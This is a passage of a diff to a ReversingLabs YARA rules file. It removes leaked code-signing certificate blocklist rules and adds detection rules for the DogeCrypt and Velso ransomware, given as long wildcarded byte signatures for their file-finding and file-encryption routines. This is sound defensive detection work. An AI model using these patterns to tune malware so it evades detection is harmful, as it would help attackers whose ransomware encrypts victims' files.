?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF + 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\x97\\xA5\\xE7\\x85\\xA7\\xE5\\xB3\\xB0\\xE5\\xB7\\x9D\\xE5\\x9B\\xBD\\xE9\\x99\\x85\\xE7\\x9F\\xBF\\xE4\\xB8\\x9A\\xE8\\xB4\\xB8\\xE6\\x98\\x93\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="53:05:91:c6:1b:5e:12:12:f6:59:13:8b:7c:ea:0a:97" and 1403654399<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_07270Ff9 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Dogecrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects DogeCrypt ransomware." author = "ReversingLabs" - id = "fcd2d82a-b51d-53ff-bfae-3c83147c1903" - date = "2023-11-08" - modified = "2023-11-08" + id = "e0ca22a5-70bb-5d2c-bce4-bac49c2a81d2" + date = "2021-04-28" + modified = "2021-04-28" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L765-L781" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8f0da7c330464184fa1d5bf8d51dd8ad2e8637710a36972dcab03629cb57e910" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.DogeCrypt.yara#L1-L114" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1c19862884cf1e59d12c84f5ff6f799a4087ddc8bd887e0d2ce7da053642b851" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "DogeCrypt" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Cyber CA" and pe.signatures[i].serial=="07:27:0f:f9" and 1308182400<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_0727100D : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "1ee866ec-a445-5a79-b824-37f28a49f20b" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L783-L799" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a09f4004ed002b90d67a3baddde74832e6c7b70e8b330347ef169460750aa344" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files_DogeCrypt_p1 = { + 50 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? BA ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 0F 43 15 ?? ?? ?? ?? 8B 85 + ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 2B C6 89 B5 ?? ?? ?? ?? 3B C8 77 ?? 83 BD ?? ?? ?? ?? + ?? 8D 3C 31 8D 04 09 89 BD ?? ?? ?? ?? 50 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43 + B5 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 + C6 85 ?? ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? + ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 + ?? ?? ?? ?? 50 FF D6 8B F8 83 FF ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A + ?? 0F 43 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF D6 8B + F0 83 FE ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B + 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? + 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? + ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? + ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? + ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? + ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? + ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? + ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? + ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 + } + $encrypt_files_DogeCrypt_p2 = { + C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 95 ?? ?? ?? ?? 83 + FA ?? 0F 82 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? + ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? E9 + ?? ?? ?? ?? 90 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF + 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 0F 42 DA 85 C0 74 + ?? 85 C9 74 ?? 51 8D 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? + 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? + ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? EB ?? 56 8B 35 ?? ?? ?? ?? FF D6 57 + FF D6 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 51 E8 + ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 33 C0 66 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? 89 85 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? + ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 + C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 + 5D C3 + } + $find_files_DogeCrypt = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 + F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ?? + ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF + 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B + CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B + 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF + 57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 + C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA + ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB + 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56 + 1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? + 83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? + ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15 + ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 + C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? + 80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 + E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 + 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 + } + $decrypt_DesucryptKeyContainer_DogeCrypt = { + 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8D 55 ?? 83 7D ?? ?? 8B 5D ?? 8B 35 ?? ?? ?? ?? 0F 43 D3 A1 ?? ?? ?? ?? 8B + 4D ?? 2B C6 89 75 ?? 3B C8 77 ?? 83 3D ?? ?? ?? ?? ?? 8D 3C 31 8D 04 09 89 3D ?? ?? + ?? ?? 50 8B 45 ?? BE ?? ?? ?? ?? 0F 43 35 ?? ?? ?? ?? 52 8D 04 46 50 E8 ?? ?? ?? ?? + 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 52 C6 45 ?? ?? FF 75 ?? 51 B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ?? ?? ?? + 8B C3 81 F9 ?? ?? ?? ?? 72 ?? 8B 5B ?? 83 C1 ?? 2B C3 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? + ?? ?? 51 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 3D ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6A ?? 0F 43 + 05 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 8B F0 83 FE ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 6A ?? 68 ?? ?? + ?? ?? 56 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 50 E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 8D 45 ?? 6A ?? + 50 C6 07 ?? FF 35 ?? ?? ?? ?? 57 56 FF D3 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? + ?? ?? 57 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? BA ?? ?? ?? ?? B9 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? B8 ?? ?? + ?? ?? EB ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? + ?? ?? 8B E5 5D C3 E8 ?? ?? ?? ?? E8 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "DigiNotar Cyber CA" and pe.signatures[i].serial=="07:27:10:0d" and 1308182400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($decrypt_DesucryptKeyContainer_DogeCrypt) and ($find_files_DogeCrypt) and ( all of ($encrypt_files_DogeCrypt_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_07271003 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Velso : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects Velso ransomware." author = "ReversingLabs" - id = "7573c436-5bf9-5522-9952-e30dbbccd092" - date = "2023-11-08" - modified = "2023-11-08" + id = "72c7baaa-4f83-54c5-ba71-2b45e5eeefd2" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L801-L817" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "14c201b4fdda5b3553732a173a3d6705129c54f2a50d26997d63a77be8504285" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Velso.yara#L1-L230" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "602be848a26106a1bd46cfc515578f0628687e6cb352e609a274220a61bcb620" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Velso" + tc_detection_factor = 5 importance = 25 + strings: + $find_files_p1 = { + 55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 A5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 75 ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 89 04 24 E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? C9 C3 C7 04 24 ?? ?? ?? ?? 8B 4D ?? + C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? + ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? + ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? + 85 C0 74 ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? + C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 84 ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? + ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? + E8 ?? ?? ?? ?? 85 C0 51 0F 84 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? + ?? 85 C0 52 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? + ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 4D ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 + 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? + 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 + } + $find_files_p2 = { + 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 52 52 8D 95 + ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? + EB ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 52 52 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 51 51 74 ?? + 8D 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 52 52 74 ?? + F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 89 85 ?? ?? ?? ?? + 8B 45 ?? 8B 51 ?? 8D 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 51 51 89 44 24 ?? 8B 45 ?? 89 44 24 + ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? + ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 74 ?? 89 04 + 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 + 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? + 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 + 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? EB + ?? 83 C5 ?? 83 BD ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 87 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? FF 24 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 + } + $enum_resources_p1 = { + 55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? 89 65 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 45 ?? C7 45 ?? + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 EC ?? 85 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 + ?? C9 C2 ?? ?? 8B 45 ?? C7 04 24 ?? ?? ?? ?? 89 44 24 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 EC ?? 85 C0 89 85 ?? ?? ?? ?? 74 ?? 90 8D B4 26 ?? ?? ?? ?? 8B 45 ?? C7 + 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 55 ?? + 89 54 24 ?? 8B 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 + 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 + 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? + 85 C0 0F 94 C0 0F B6 C0 89 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B + } + $enum_resources_p2 = { + 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 45 ?? EB ?? 8B 45 ?? 8B 40 ?? 89 85 + ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 83 45 ?? ?? 8B + 85 ?? ?? ?? ?? 39 45 ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 8D 45 ?? 8B 4D + ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? + 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 83 EC ?? 39 D0 0F 84 + ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D 45 ?? 8B + 4D ?? 89 45 ?? 8B 45 ?? 8B 51 ?? 8D 4D ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 45 ?? + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 EC ?? 8B 40 ?? 89 C2 89 85 ?? ?? ?? ?? 8D 45 + ?? 85 D2 89 45 ?? B8 ?? ?? ?? ?? 74 ?? 89 14 24 E8 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 89 + 44 24 ?? 8B 85 ?? ?? ?? ?? 8D 4D ?? 89 04 24 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D + 45 ?? 83 EC ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 04 24 C7 45 ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D + 55 ?? 39 D0 0F 84 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 + } + $encrypt_files_p1 = { + 55 89 E5 81 EC ?? ?? ?? ?? 8D 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? + C6 45 ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 + 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 03 48 ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 01 C7 04 24 ?? ?? ?? ?? C7 85 + ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 EC ?? C7 85 ?? ?? ?? ?? + ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 51 ?? 8D + 8D ?? ?? ?? ?? 8B 00 01 C2 89 04 24 89 54 24 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? + ?? ?? ?? B8 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 0F 86 ?? ?? ?? ?? 8D 8D + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 89 04 24 C7 85 ?? ?? ?? ?? ?? ?? ?? 